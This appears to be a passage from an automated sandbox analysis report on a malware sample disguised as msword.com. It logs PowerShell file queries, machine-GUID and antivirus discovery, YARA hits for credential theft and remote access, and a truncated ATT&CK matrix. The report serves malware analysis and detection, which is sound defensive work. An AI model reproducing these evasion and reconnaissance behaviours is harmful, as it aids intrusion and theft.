Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: msword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara matchFile source: Process Memory Space: msword.com PID: 9108, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara matchFile source: Process Memory Space: msword.com PID: 9108, type: MEMORYSTR
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts11
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
11
Disable or Modify Tools
11
Input Capture
2
